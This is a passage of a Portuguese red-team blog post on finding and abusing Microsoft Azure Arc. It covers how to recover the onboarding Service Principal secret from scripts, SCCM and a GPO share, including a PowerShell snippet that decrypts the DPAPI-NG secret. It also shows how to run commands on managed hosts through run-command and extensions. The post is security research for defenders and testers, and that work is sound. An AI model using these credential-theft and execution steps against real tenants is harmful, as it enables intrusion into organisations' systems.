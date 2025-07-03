Tags
Identificação e abuso do Azure Arc para escalada híbrida e persistência

Vista lateral de perto de um homem curvado sobre um computador em um espaço de escritório escuro

Introdução

Minha pesquisa sobre o Microsoft Azure começou durante uma recente operação, onde nos deparamos com um script do PowerShell contendo um Service Principal codificado que era responsável por implementar o Arc em sistemas locais. Eu não sabia muito sobre o serviço, então comecei a fazer uma pesquisa para determinar o que poderíamos fazer com as credenciais recuperadas. Acabamos sendo capazes de usar técnicas documentadas em pesquisas anteriores sobre este assunto para obter a execução de código em um controlador de domínio e voltar para o Microsoft Azure, mas isso me fez pensar em algumas questões mais amplas relacionadas ao Arc: Como você identificá-lo em ambientes? Quais configurações (configurações incorretas) poderiam existir que permitiriam o escalonamento? Quais outros vetores de execução de código existem nele? Poderia ser usado como um mecanismo de persistência fora de banda?

Então, o que é Azure Arc? Em um nível elevado, ele estende os recursos de gerenciamento nativos do Azure para uma variedade de Recursos que não são do Azure, como sistemas locais, clusters e implementações —permitindo que esses sistemas sejam gerenciados pelo Resource Manager da mesma forma que um host nativo do Azure seria. Depois que o agente Arc é implementado em um host, ele registra os Recursos subjacentes no Azure e expõe um pacote de funcionalidades de gerenciamento: monitoramento, aplicação de políticas, gerenciamento de atualizações, etc. No entanto, o mais interessante para mim foi a capacidade de usá-lo para baixar arquivos remotamente e executar comandos de um processo confiável no contexto de NT_AUTHORITY\SYSTEM.  Embora algumas das funcionalidades do Arc se sobreponham ao Intune, o Arc foi desenvolvido especificamente para gerenciar infraestrutura e servidores, não de endpoint ou dispositivos móveis.

O Arc não é muito novo (foi lançado originalmente em 2019), e outras pesquisas anteriores descreveram como ele pode ser usado para executar código e persistir em ambientes. Além disso, a pesquisa existente sobre o ataque a máquinas virtuais (VMs) tem sobreposições significativas com o Arc, já que os sistemas locais configurados com o Arc podem ser gerenciados no Azure da mesma forma que uma VM nativa do Azure. Com este blog, espero fornecer um pouco mais de contexto, concentrando-se em áreas não tão exploradas nas pesquisas existentes, bem como delinear o uso ofensivo da plataforma dentro de um fluxo de trabalho típico da equipe vermelha e fornecer orientação defensiva complementar para implementações do Azure Arc .

Processo de implementação do Azure Arc

Antes de entrar em detalhes sobre o ataque ao Arc, eu o configurei em um locatário de teste para obter uma melhor compreensão de como o serviço funciona e de como é o processo de implementação. Como o Arc é um serviço do Azure, ele exige uma assinatura e um grupo de recursos downstream para anexar recursos gerenciados; o acesso também é gerenciado posteriormente por meio das funções de controle de acesso baseado em função (RBAC) do Azure atribuídas nesses escopos. Se quiser configurar isso em seu próprio laboratório, uma observação adicional é que você terá que se registrar com os seguintes provedores de recursos na sua assinatura em Assinaturas -> (sua assinatura) -> Configurações -> Provedores de Recursos:

  • Microsoft.HybridCompute
  • Microsoft.GuestConfiguration
  • Microsoft.HybridConnectivity

Depois que esses pré-requisitos forem atendidos, uma conta com funções apropriadas atribuídas na assinatura associada ao Arc poderá ser usada para acessar o serviço, onde você verá uma janela de gerenciamento geral.

captura de tela da janela de visão geral do Arc Management
Fig 1: Janela de visão geral do gerenciamento do Arc

Como ainda não implementamos o Arc em nenhum lugar, entraremos imediatamente na interface de Adicionar Recursos. Esse menu contém opções de implementação e descoberta para vários tipos de dispositivos, mas o de maior interesse imediato é a funcionalidade de Máquina, que nos permite gerenciar servidores Windows e Linux hospedados fora do locatário atual do Azure. Clicando aqui, é possível ver uma variedade de opções de implementação para um ou vários hosts.

captura de tela das opções de implementação do Arc
Fig 2: Opções de implementação de arco

Dentro dessa interface, os servidor único e o Windows Server com opções de instalador são mais adequados para implementações únicas, e as opções AWS/ Update Management se concentram mais em dispositivos nativos da nuvem já gerenciados por meio do Azure ou AWS. Neste caso, estamos mais interessados na opção de implementação em vários servidores, pois essa provavelmente será a rota mais comum que um administrador de TI usaria em um cenário de implementação híbrida empresarial.

Ao clicar na opção de vários servidores, o fluxo de trabalho de implementação faz uma variedade de perguntas básicas sobre a assinatura, o grupo de recursos e a região para anexar os dispositivos gerenciados pelo Arc. Tudo é bastante simples até a parte inferior desta página, onde somos solicitados a fornecer um Service Principal para usar no registro do dispositivo durante a implementação. O bloco de texto abaixo afirma basicamente apenas que você precisa de um Service Principal configurado com a função Azure Connected Machine Onboarding para fazer uma implementação, e também oferece a opção de criar um novo Service Principal com a função apropriada atribuída.

captura de tela da configuração do Service Principal dentro da implementação de multi-servidor
Fig 3: Configuração do Service Principal na configuração de implementação de vários servidores

Neste caso, criaremos um novo Service Principal Test_Arc_SP para nossa implementação.

captura de tela representando a criação de um novo Service Principal para implementação do Arc
Fig 4: Criação de um novo Service Principal para implementação do Arc

A seguir, essa interface de criação pergunta quais funções concedemos à nosso novo Service Principal. Podemos selecionar qualquer uma das opções, incluindo o Azure Connected Machine Resource Administrator, sem qualquer contexto adicional ou avisos sobre os privilégios que essas funções conferem.

Atribuição de funções como parte da criação do Service Principal
Fig 5: Atribuição de funções como parte da criação do Service Principal

Por fim, somos apresentados a um dos quatro mecanismos compatíveis para implementar o Arc em hosts locais, como pode ser visto na imagem abaixo. Abordaremos cada um deles com um pouco mais de profundidade na seção Obtendo acesso ao Arc abaixo.

captura de tela das opções suportadas para implementações do Arc em vários hosts
Fig 6: Opções compatíveis com implementação do Arc em vários hosts

Depois que o Arc for implementado por meio de qualquer tipo de instalação escolhida e se conectar novamente ao Azure, o novo sistema do cliente aparecerá em Azure Arc -> Recursos do Azure Arc.

captura de tela da janela do inventário do Arc mostrando a integração bem-sucedida de wks1-1
Fig 7: Janela de inventário de arco mostrando a integração bem-sucedida de wks1-1

Identificar o Azure Arc em um ambiente

Ao pensar no uso ofensivo do Arc, a primeira pergunta que me fez fazer foi: “Quando entro em um ambiente corporativo híbrido, que reconhecimento posso realizar para determinar se o Arc está em uso?” Esses indicadores podem ser divididos em duas categorias: Azure e locais.

Azure

O acesso ao Arc é controlado via Azure RBAC, o que significa que o acesso ao serviço e até mesmo a visibilidade básica de seu uso estão em grande parte fora do alcance de objetos não atribuídos a nenhuma função em uma assinatura associada a uma implementação do Arc. Dito isso, ainda existem alguns métodos indiretos que podem nos permitir determinar se o Arc está em uso e até mesmo em quais sistemas ele provavelmente está instalado e que podem ser identificados por um usuário sem privilégios do Entra. Percorrendo as etapas do processo de implementação acima, há vários pontos nos quais os objetos são adicionados ou modificados no Microsoft Entra que podem ser observados para determinar se o Arc está em uso em um locatário.

Primeiro, quando uma assinatura em um locatário do Azure é configurada com os Recursos necessários para o Arc (por exemplo, Microsoft.HybridCompute), dois Service Principals intitulados Arc Token Service e Arc Public Cloud – Servers serão criados. Isso não significa necessariamente que o Arc tenha sido de fato implementado em uma organização, mas que pelo menos uma assinatura em um locatário foi configurada de forma a que o serviço fosse suportado. Um exemplo disso pode ser visto abaixo em um novo locatário do Azure, antes e depois de configurar os provedores de recursos necessários para o Arc.

Pesquisando Service Principals associados ao Arc antes de configurar um locatário para o Arc
Fig 8: Pesquisando Service Principals associados ao Arc antes de configurar um locatário para o Arc
Pesquisando Service Principals associados ao Arc após configurar um locatário para o Arc
Fig 9: Pesquisando Service Principals associados ao Arc após configurar um locatário para o Arc

Continuando o processo de implementação, um Service Principals é usado para unir dispositivos ao Arc, conforme descrito no processo de implementação abordado na seção anterior. Pode ser um Service Principals existente anteriormente que teve manualmente as funções de RBAC necessárias atribuídas a ele, ou um Service Principals gerado automaticamente por meio da interface de implementação do Arc. Se um administrador criar um Service Principal diretamente pelo Arc, ela será configurada automaticamente com a tag AzureArcSPN pelo Azure, que pode ser pesquisada por um usuário sem privilégios do Entra diretamente na linha de comando do Azure ou a partir dos resultados de coleta de ROADrecon e AzureHound. Embora novamente não forneça evidências concretas de que o Arc foi de fato implementado, um Service Principal configurado desta maneira mostraria que um administrador neste locatário tinha pelo menos interagido com as etapas do processo de implementação do Arc. Um exemplo da criação de um Service Principal por meio do Arc, bem como os dados de tag identificáveis resultantes coletados pelo ROADrecon, pode ser visto abaixo.

Tag AzureArcSPN que indica um Service Principal criado por meio do processo de implementação no Arc
Fig 10: Tag AzureArcSPN que indica um Service Principal criado por meio do processo de implementação no Arc

Finalmente, quando um sistema é integrado ao Arc, uma Identidade Gerenciada é criada dentro do Entra para a máquina e pode receber funções tanto no Entra quanto no Azure, como qualquer outro Service Principal. Como essa identidade gerenciada está presente no Entra, por padrão, um diretor sem privilégios pode enumerar sistemas integrados ao Arc filtrando os dados de reconhecimento do Azure coletados para procurar dispositivos com um ResourceID contendo Microsoft.HybridCompute (note que isso é diferente de um sistema híbrido dispositivo se uniu ao Entra e não deve resultar em nenhum falso positivo). Se você tiver acesso à linha de comando do Azure, esse processo será bastante simples, utilizando o seguinte comando:

az ad sp list --filter "servicePrincipalType eq 'ManagedIdentity'" --query
"[?alternativeNames[?contains(@, 'Microsoft.HybridCompute')]].{Name: displayName,
ResourceID: alternativeNames[?contains(@, 'Microsoft.HybridCompute')]|[0]}" --output table
Identificação de clientes Arc em um locatário do Azure com base no identificador Microsoft.HybridCompute
Fig 11: Identificação de clientes Arc em um locatário do Azure com base no identificador Microsoft.HybridCompute

Essa longa sequência de ResourceID também tem o benefício adicional de conter a ID da assinatura e o grupo de recursos ao qual o sistema está associado, permitindo a identificação de múltiplas implementações de Arc em diferentes ambientes.

Como alternativa, se você coletou dados do Azure via ROADrecon ou AzureHound, você pode analisar esses resultados para identificar objetos gerenciados pelo Arc. No ROADrecon, as informações pertinentes são armazenadas no ResourceID e, nos arquivos de coleta JSON do AzureHound, as mesmas informações são armazenadas no atributo AlternativeNames . Embora não pareça que esse atributo seja copiado para o BloodHound ou não esteja acessível diretamente, a pesquisa direta do arquivo JSON pode permitir a recuperação de uma lista completa de objetos gerenciados.

Análise da saída do ROADrecon para identificar um cliente Arc
Fig 12: Análise da saída do ROADrecon para identificar um cliente Arc
Análise da saída bruta do AzureHound para identificar os clientes Arc
Fig 13: Análise da saída bruta do AzureHound para identificar os clientes Arc

On-premises

Os indicadores locais da implementação do Arc se enquadram em uma das duas categorias: localhost e rede. Quando o cliente Arc é instalado em um sistema, ele cria a pasta C:\Program Files\AzureConnectedMachineAgent, que contém todos os arquivos pertinentes relacionados ao cliente Arc. A presença desta pasta, bem como de processos e serviços relacionados ao Arc (por exemplo, gc_arc_service.exe ou arcproxy.exe), pode fornecer algumas coisas simples para verificar. Além disso, com base no mecanismo de implementação usado para enviar o cliente Arc para sistemas na rede, pode haver algumas coisas adicionais que poderiam ser pesquisadas. Por exemplo, se o Arc for implementado via GPO, o processo de configuração criará um GPO gerado automaticamente chamado [MSFT] Azure Arc Servers Onboarding(DateTimeOfGPOCreation).

GPO de implementação do Arc gerado automaticamente
Fig 14: GPO de implementação do Arc gerado automaticamente

Obtenção de acesso ao Azure Arc

Então, se identificamos que o Arc está em uso em um ambiente, como obtemos acesso a ele? Para responder a essa pergunta, é importante primeiro entender o que constitui especificamente o acesso que estaríamos interessados. Como o principal objetivo final do acesso normalmente seria executar código em um endpoint gerenciado, trabalhar para trás das permissões que permitem a execução de código para as funções do Azure que concedem essas permissões pode fornecer um bom ponto de partida para contas e funções de nosso interesse. Analisando a pesquisa anterior de Benedikt Trobl na NSIDE Attack Logic, vemos que podemos executar uma consulta do PowerShell que obterá todas as funções que concedem permissões que permitem pelo menos um mecanismo de execução de código por meio do Arc (mais por vir sobre as especificidades desses mecanismos na próxima seção). A consulta e a saída resultante podem ser vistas abaixo:

az role definition list --query "[?(!isCustom && (contains(permissions[0].actions,
'Microsoft.HybridCompute/machines/extensions/write') || contains(permissions[0].actions,
'Microsoft.HybridCompute/machines/extensions/*') || contains(permissions[0].actions,
'Microsoft.GuestConfiguration/guestConfigurationAssignments/write') || contains(permissions[0].actions,
'Microsoft.GuestConfiguration/*/write') || contains(permissions[0].actions,
'Microsoft.GuestConfiguration/guestConfigurationAssignments/*') || contains(permissions[0].actions
'Microsoft.HybridCompute/machines/*/write') || contains(permissions[0].actions,
'Microsoft.HybridCompute/machines/*') || contains(permissions[0].actions,
'Microsoft.HybridCompute/*/write') || contains(permissions[0].actions, '*/write') || contains(permissions[0].actions, '*')))].{DisplayName:roleName, Actions:permissions[0].actions}" --output table

 

Funções que concedem a capacidade de executar código em clientes gerenciados pelo Arc por meio de pelo menos um caminho
Fig 15: Funções que concedem a capacidade de executar código em clientes gerenciados pelo Arc por meio de pelo menos um caminho

Além de algumas funções estranhas que se destacam, como Log Analytics Contributor, uma das mais interessantes é a função Azure Connected Machine Resource Administrator (Administrador de Recursos de Máquina Conectada do Azure). Se você se lembra da seção anterior do processo de implementação do Azure Arc, essa era uma das funções atribuíveis ao Service Principal criado durante o processo de implementação do Arc.

Atribuição de funções a um novo Service Principal para implementação de Arc. Não clique no botão de administração, mesmo que você realmente queira
Fig 16: Atribuição de funções a um novo Service Principal para implementação do Arc. Não clique no botão de administração, mesmo que você realmente queira

Isso essencialmente coloca o Service Principal de implementação que, por necessidade, provavelmente terá seu segredo acessível na rede local , a apenas uma única caixa de seleção (uma caixa de seleção que não apresenta qualquer aviso ou contexto adicional sobre o risco) de se tornar um administrador dentro do Arc. Um Service Principal com esse papel administrativo atribuído de forma inadvertida durante a criação poderia não apenas ser usado para registrar novos clientes Arc dentro do Azure, mas também para executar comandos em qualquer cliente Arc instalado. Foi essa lacuna compreensível que identificamos e da qual tiramos proveito durante nossa avaliação recente, permitindo-nos escalar privilégios por meio do Arc e assumir o controle do ambiente local do cliente.

Esse Service Principal de implementação parece ser um alvo inicial muito bom, especialmente se você não tiver os privilégios necessários para obter listas de outras contas com as outras funções observadas que concedem a execução do código atribuída a elas. Mas como você faria para tentar conseguir acesso a ele? Em primeiro lugar, e provavelmente de forma mais direta, se você tiver um caminho dentro do Entra para obter acesso a um Service Principal associado ao Arc adicionando um segredo a ela (por exemplo, proprietário do Service Principal, Administrador da Aplicação, etc.), você poderá modificar diretamente o objeto e usá-lo para autenticar, potencialmente permitindo que você obtenha acesso privilegiado ao Arc. Além disso, os mecanismos de implementação que a Arc usa também podem ser configurados incorretamente ou permitir a escalada por meio da recuperação do segredo principal do serviço de implementação. Em seguida, daremos uma olhada em cada um dos quatro principais mecanismos de implementação empresarial suportados pelo Arc para identificar possíveis caminhos de escalada a serem verificados.

Script básico

O método de implementação padrão e mais básico para o Arc é através do download de um script do PowerShell gerado automaticamente que um administrador de TI pode executar em vários sistemas. Esse script extrai o instalador MSI pertinente do site da Microsoft e, posteriormente, executa a configuração de acompanhamento para conectar o cliente instalado ao locatário do Azure correto. De forma um tanto hilária, o mecanismo de autenticação padrão suportado nesse script gerado automaticamente é codificar o segredo do Service Principal que está sendo usado para implementação no script.

Script padrão gerado pelo Arc para implementações em vários hosts
Fig 17: Script padrão gerado pelo Arc para implementações em vário hosts

Como esse mecanismo de implementação é muito simples, não há muito o que fazer para obter acesso, a não ser ficar de olho, durante o reconhecimento normal do compartilhamento de arquivos, em busca de scripts do PowerShell com o nome de script padrão OnboardingScript.ps1, bem como scripts com nomes ou conteúdo relacionado ao Arc.

Gerenciador de configuração

Selecionar o Configuration Manager para implementação gera um script PowerShell idêntico ao acima, com a principal diferença sendo que o Arc fornece orientações adicionais sobre como implementar o script diretamente por meio do System Center Configuration Manager (SCCM) da Microsoft, seja por meio de uma execução de script direta ou como uma sequência de tarefas.

Passos de implementação específicos do SCCM, recomendando a implementação via script SCCM ou sequência de tarefas
Fig 18: Etapas de implementação específicas do SCCM, recomendando a implementação por meio de script SCCM ou sequência de tarefas

Embora esses sejam os dois mecanismos recomendados para implementação, um administrador de TI pode, alternativamente, usar algum outro mecanismo de implementação por meio do SCCM, como uma instalação de pacotes ou aplicação. Independentemente da opção de implementação em uso, é importante ter em mente o conceito de coleções no SCCM, que servem como escopo alvo para a implementação de sequências de tarefas e (opcionalmente) scripts. A tentativa de recuperar dados do SCCM de um host aleatório no ambiente provavelmente não produzirá grandes resultados porque, se o host não for um membro da coleção apropriada, ele não poderá recuperar informações pertinentes na maioria dos casos. Em vez disso, primeiro mover lateralmente para um host que foi identificado como sendo um cliente Arc (ou, melhor ainda, um ponto de gerenciamento SCCM ou servidor de banco de dados) e, em seguida, realizar reconhecimento SCCM provavelmente terá melhores resultados.

Gerenciador de configuração—script

O SCCM Configuration Manager contém funcionalidades que permitem aos administradores executar scripts PowerShell em sistemas gerenciados. Os scripts não são extraídos pelo cliente SCCM da mesma maneira que sequências de tarefas ou pacotes; em vez disso, são enviados do servidor sob demanda para os sistemas dos clientes. Para testar isso, podemos criar um script simples no SCCM Configuration Manager usando o script de implementação do Arc gerado automaticamente. Vamos deixar o segredo por preencher por enquanto, pois o sistema que estamos implementando já tem o Arc instalado.

Criando um script SCCM para implementar o Arc
Fig 19: Criando um script SCCM para implementar Arc

Quando o script é implementado por meio do SCCM, ele é copiado para o diretório C:\Windows\CCM\ScriptStore no sistema do cliente e configurado com uma lista de controle de acesso discricionário (DACL) que restringe o acesso somente a NT_AUTHORITY\SYSTEM, antes de ser executado pelo cliente SCCM. Os arquivos nesta pasta são limpos periodicamente com base nas configurações específicas da instância, mas definitivamente vale a pena verificar este ou outros scripts que possam conter dados sensíveis.

Executando o script de implementação nos clientes SCCM. Observe que o GUID começa com 4909*
Fig 20: Execução do script de implementação nos clientes do SCCM. Observe que o GUID começa com 4909*
Script do PowerShell criado no sistema do cliente SCCM com GUID 4909* correspondente
Fig 21: Script do PowerShell criado no sistema do cliente SCCM com GUID 4909* correspondente
DACL neste script restringindo o acesso a NT_AUTHORITY\SYSTEM
Fig 22: DACL neste script restringindo o acesso a NT_AUTHORITY\SYSTEM
O conteúdo deste script do PowerShell no cliente SCCM inclui todo o script originalmente implementado via SCCM
Fig 23: O conteúdo deste script do PowerShell no cliente SCCM inclui todo o script originalmente implementado via SCCM

Como alternativa, se você obtiver acesso ao banco de dados SCCM, poderá recuperar diretamente todos os scripts criados no SCCM usando o módulo ScriptData no SQLRecon. Um exemplo da saída da execução desse módulo no banco de dados do site para uma instância do SCCM configurada com um script para implementar o Arc pode ser visto abaixo.

Recuperação do script SCCM usado para implementar Arc do banco de dados do site SCCM com SQLRecon
Fig 24: Recuperando o script SCCM usado para implementar o Arc do banco de dados do local SCCM com SQLRecon

Na verdade, a implementação via script SCCM provavelmente não é muito provável na prática, já que a execução do script SCCM é um processo manual e pontual. Se novos servidores forem colocados on-line e precisarem ser adicionados ao Arc a qualquer momento no futuro, um administrador precisaria se lembrar de entrar novamente e executar o script novamente para aplicá-lo a sistemas adicionais.

Gerenciador de configuração—sequência de tarefas

Um processo de implementação mais automatizado e escalável seria por meio de uma sequência de tarefas aplicada a uma coleção SCCM. Para testar esse mecanismo, podemos criar uma sequência de tarefas simples que executa o script de implementação do Arc e o implementa em uma coleção SCCM contendo um sistema do qual estamos executando.

Implementar o Arc via sequência de tarefas do SCCM
Fig 25: Implementando o Arc via sequência de tarefas do SCCM

Após implementar esse script, podemos executar o comando get secrets no SharpSCCM para recuperar sequências de tarefas acessíveis contendo scripts, já que as políticas contendo scripts têm a flag de segredo adicionada a elas.

Recuperação de sequência de tarefas contendo o script de implementação do Arc usando o SharSCCM
Fig 26: Recuperação de sequência de tarefas contendo o script de implementação do Arc usando o SharpSCCM

A propriedade SourceScript dentro da política pertinente contém uma representação b64 do script original que está sendo transmitido. Convertê-lo de volta para texto simples nos permite recuperar o script original.

Decodificação do script recuperado de volta para texto simples
Fig 27: Decodificação do script recuperado de volta para texto simples

Da mesma forma que as opções disponíveis ao recuperar um script, se tivermos acesso ao banco de dados do site SCCM, também podemos recuperar diretamente os dados de sequência de tarefas usando SQLRecon.

Recuperação de sequência de tarefas usada para implementar Arc do banco de dados do site SCCM com SQLRecon
Fig 28: Recuperação da sequência de tarefas usada para implementar o Arc do banco de dados do local do SCCM com SQLRecon

Política de grupo

A implementação do Arc via Group Policy é um pouco mais complicada do que os dois mecanismos anteriores e consiste em várias etapas que começam com a configuração de um compartilhamento de rede para o qual o script, executado via Group Policy Object (GPO), pode apontar. A orientação oficial afirma de forma útil que todos os computadores do domínio devem ter acesso de leitura + escrita a esse compartilhamento, o que significa que, se esse mecanismo de implementação estiver em uso, o segredo principal do serviço deverá ser recuperável de qualquer contexto NT_AUTHORITY\SYSTEM no domínio.

Etapas de implementação específicas do GPO, solicitando a criação de um compartilhamento de rede e o download de um pacote de instalador
Fig 29: Etapas de implementação específicas do GPO, solicitando a criação de um compartilhamento de rede e o download de um pacote de instalador

Após configurar o compartilhamento e baixar + copiar no MSI do cliente Arc, a próxima etapa envolve baixar um repo do GitHub contendo scripts do PowerShell e DLLs associadas que são usadas para criar automaticamente o GPO.

Etapas de implementação específicas do GPO, solicitando o download de arquivos para serem usados durante a criação do GPO
Fig 30: Etapas de implementação específicas do GPO, solicitando o download de arquivos para serem usados durante a criação do GPO

Por fim, é gerado um script do PowerShell que chama os arquivos baixados do GitHub, com argumentos baseados na localização da Compartilhe de implementação Arc configurada anteriormente.

Comando a ser executado por um administrador assim que toda a configuração anterior for concluída para criar o GPO de implementação do Arc
Fig 31: Comando a ser executado por um administrador assim que toda a configuração anterior for concluída para criar o GPO de implementação do Arc

A execução desse script do PowerShell resultante fará com que um GPO seja criado, o que cria uma tarefa agendada que instala o cliente Arc usando os arquivos hospedados no compartilhamento de implementação e o conecta ao Azure. Esse GPO pode posteriormente ser vinculado a uma unidade organizacional (OU) contendo sistemas para implementar o Arc.

Conteúdo do GPO de implementação do Arc resultante, que cria uma tarefa agendada responsável por implementar o Arc nos sistemas
Fig 32: Conteúdo do GPO de implementação do Arc resultante, que cria uma tarefa agendada responsável por implementar o Arc nos sistemas

Se um GPO que corresponda a essa convenção de nomenclatura for identificado durante o reconhecimento padrão do Active Directory, os arquivos GPO podem ser revisados para determinar a localização do compartilhamento de rede que contém os arquivos de implementação.

GPO de implementação do Arc com um GUID que começa com 5C25
Fig 33: GPO de implementação do Arc com um GUID que começa com 5C25
Arquivo de configuração de tarefa agendada enviada pelo GPO de implementação do Arc, que contém o caminho para o script de implementação do Arc
Fig 34: Arquivo de configuração de tarefa agendada enviado pelo GPO de implementação do Arc, que contém o caminho para o script de implementação do Arc

Com algum tipo de acesso no contexto de NT_AUTHORITY\SYSTEM, é possível navegar remotamente até esse compartilahmento (se criado com o acesso padrão/recomendado pelo MS), que terá a seguinte aparência:

Arquivos contidos no compartilhamento de implementação do Arc
Fig 35: Arquivos contidos no compartilhamento de implementação do Arc

O mais interessante é o arquivo cryptoServicePrincipalSecret, com o nome extremamente visível. Dê uma olhada no script EnableAzureArc.ps1 mostra que esse segredo é um blob criptografado usando DPAPI-NG.

Código do PowerShell responsável por recuperar o segredo principal do serviço por meio da descriptografia do blob DPAPI-NG
Fig 36: Código PowerShell responsável por recuperar o segredo principal do serviço por meio da descriptografia do blob DPAPI-NG

O DPAPI-NG (ou Cryptographic Next Generation [CNG] DPAPI) permite não apenas a funcionalidade de criptografia e descriptografia DPAPI específica do usuário ou da máquina, mas também operações baseadas nas associações de um objeto. Por exemplo, nessa instância, o blob DPAPI-NG dentro encryptedServicePrincipalSecret é configurado para permitir que qualquer membro do grupo de computadores do domínio o descriptografe. Eu criei um script PowerShell super simples como prova de conceito, mas deve ser bastante simples traduzir o código de AzureArcDeployment.psm1 (que por si só é apenas um código wrapper ao redor.NET) em um assembly que pode ser executado na memória em um beacon no contexto de NT_AUTHORITY\SYSTEM para recuperar e descriptografar o segredo.

Descriptografia de blob DPAPI-NG para recuperar o segredo do Service Principal de texto simples
Fig 37: Descriptografia de blob DPAPI-NG para recuperar o segredo do Service Principal de texto simples
        $SourceFilesFullPath = "\\Path\to\Arc\Deploy\Folder"
        $workfolder = "C:\Windows\temp"
        Copy-Item (Join-Path $SourceFilesFullPath "AzureArcDeployment.psm1") $workfolder -
Force
        Import-Module (Join-Path $workfolder "AzureArcDeployment.psm1")
        $encryptedSecret = Get-Content (Join-Path $SourceFilesFullPath
encryptedServicePrincipalSecret)
        $sps = [DpapiNgUtil]::UnprotectBase64($encryptedSecret)

Finalmente, todas as outras informações de conexão pertinentes, como ID de Service Principal, ID da Assinatura etc., podem ser encontradas no arquivo ArcInfo.json, também localizado no mesmo compartilhamento de implementação.

Conteúdo do arquivo ArcInfo.json
Figura 38: Conteúdo do arquivo ArcInfo.json

Ansible

A opção final de implementação oficial gera um playbook do Ansible muito semelhante aos scripts do PowerShell abordados acima. As especificações do ataque ao Ansible podem variar bastante com base na configuração e no ambiente e, como resultado, não vamos expandir mais sobre esse mecanismo de implementação.

captura de tela da implementação do Arc via Ansible
Fig 39: implementação do Arc via Ansible

Uma observação sobre implementações do Linux

Embora o Arc ofereça suporte ao gerenciamento de hosts Linux, os métodos de implementação disponíveis diretamente na pá do Arc no Azure se inclinam fortemente para dispositivos baseados no Windows. As implementações do Linux são suportadas por meio do uso de um script bash, mas da mesma forma que as implementações do Ansible, elas provavelmente terão um grau muito maior de variação quando aplicadas em um ambiente corporativo.

Executando código via Azure Arc

Continuando, vamos supor que recuperamos com sucesso o segredo de um diretor de serviço e que esse diretor de serviço (ou outra conta recuperada) tem privilégios de execução no Arc. Como o objetivo principal do Arc é expor os dispositivos locais ao plano de controle do Azure, uma variedade de primitivas de execução de código normalmente associadas às VMs do Azure entram no escopo para obter acesso a hosts locais que tenham o cliente Arc instalado. No entanto, manter o foco em avenidas de execução que exigem apenas as permissões específicas do Arc acima mencionadas oferece duas categorias amplas de ações de execução: comandos de execução e adições/modificações de extensão. Ambos os vetores de execução funcionam de forma praticamente idêntica a uma execução equivalente em relação a uma VM do Azure e foram documentados extensamente por outros em blogs/ferramentas anteriores, portanto, não nos aprofundaremos muito em detalhes específicos sobre eles além do uso operacional e algumas peculiaridades legais que são tão amplamente documentado.

Comando de execução

O comando de execução é uma espécie de pseudo-extensão que compartilha muitas das características do disco e especificidades da árvore de execução com outras extensões, mas é instalada automaticamente junto com o Arc e não aparece na lista de extensões instaladas de um sistema gerenciado. Esse recurso permite uma maneira direta de executar comandos em um cliente gerenciado através do Arc, com o principal pré-requisito é que a versão do cliente deve ser >= 1.33. Você pode verificar isso com o comando az connectedmachine show, conforme mostrado abaixo.

Saída do comando az connectmachine show, indicando uma versão > 1.33
Fig 40: Saída do comando az linkedmachine show, indicando uma versão > 1.33

Observe que a tentativa de executar um comando por meio da linha de comandos az (CLI) exige não apenas as permissões de gravação observadas anteriormente, mas também privilégios de leitura no grupo de recursos, que, por padrão, uma entidade de serviço gerada automaticamente não terá. Como resultado, tentar executar um comando diretamente de CLI de az resultados em erro.

A tentativa de usar a CLI de az para executar um comando em um cliente gerenciado resulta em um erro
Fig 41: A tentativa de usar a CLI de az para executar um comando em um cliente gerenciado resulta em um erro

Isso pode ser ignorado interagindo diretamente com a API REST do Azure, embora não seja possível recuperar a saída dos comandos executados. Neste exemplo, criaremos um trabalho de execução chamado run-notepad que apenas inicia o notepad.exe no sistema do cliente.

Execução do mesmo comando da API de REST az
Fig 42: Execução do mesmo comando da API de REST az

O comando transmitido é gravado em um script do PowerShell na pasta C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows\[version]\Downloads, com um nome correspondente ao nome do trabalho de execução conforme criado no Arc e, por fim, executado no contexto de NT_AUTHORITY\SYSTEM.

Script escrito no sistema do cliente Arc como resultado da execução do comando de execução
Fig 43: Script escrito no sistema do cliente Arc como resultado da execução do comando de execução
Árvore de processos do comando de execução do Arc, o processo executado (6848) é secundário ao PowerShell.exe (9048), que termina após a criação do secundário
Fig 44: Árvore de processos do comando de execução do Arc, o processo executado (6848) é secundário ao PowerShell.exe (9048), que termina após a criação do secundário

Este script do PowerShell não é excluído automaticamente na conclusão da execução, embora execuções adicionais de um trabalho de execução com o mesmo nome façam com que o script original seja excluído e um novo criado com um sufixo iterado, como visto abaixo.

A tarefa de execução atualizada agora executa cálculo em vez do bloco de notas, limpa o script anterior e cria um novo com um sufixo iterado
Fig 45: A tarefa de execução atualizada agora executa cálculo em vez do bloco de notas, limpa o script anterior e cria um novo com um sufixo iterado

Além desse script, vários outros arquivos são criados no disco durante cada execução de comando de execução. Isso será abordado com maior profundidade na seção Orientação defensiva.

Além disso, lembre-se de que um comando de execução cria um objeto no Azure que precisa ser excluído posteriormente após a conclusão da execução. Como essa ação não é lida no nível do grupo de recursos, ela pode ser executada diretamente por meio da CLI de az.

Exclusão do objeto associado a um comando de execução criado anteriormente
Fig 46: Exclusão do objeto associado a um comando de execução criado anteriormente

Extensões

Os clientes do Arc podem ter sua funcionalidade aumentada por meio da instalação de uma variedade de extensões aprovadas pela Microsoft, da mesma forma que as VMs do Azure. A extensão mais frequentemente explorada é a Custom Script Extension (CSE) for Windows, que permite a execução de comandos arbitrários e o download de arquivos da internet. No entanto, outras extensões oferecem diferentes árvores de execução que podem ajudar a evitar uma detecção estática focada na execução de um CSE. Em seguida, daremos uma olhada na execução por meio de um CSE, bem como na extensão do Windows Admin Center.

Extensão de script personalizado

Supondo que você esteja executando no contexto de um Service Principal provisionado com a função de Administrador de Recursos de Máquinas Conectadas do Azure em uma assinatura com configurações padrão, você precisará novamente enviar comandos por meio da API REST do Azure. Antes da execução, uma ressalva da execução baseada em extensão é que apenas uma única cópia de uma extensão pode ser implementada em um host em um determinado momento, o que significa que, se um CSE já tiver sido adicionado ao host alvo, você precisaria atualizar da extensão existente em vez de criar uma nova extensão. A lista de extensões atualmente instaladas em um host pode ser recuperada da CLI de az com o seguinte:

az connectedmachine extension list --machine-name [machine name] --resource-group [rg name]

Neste caso, ainda não há extensões instaladas neste host:

Cliente do Arc sem extensões associadas
Fig 47: Cliente do Arc sem extensões associadas

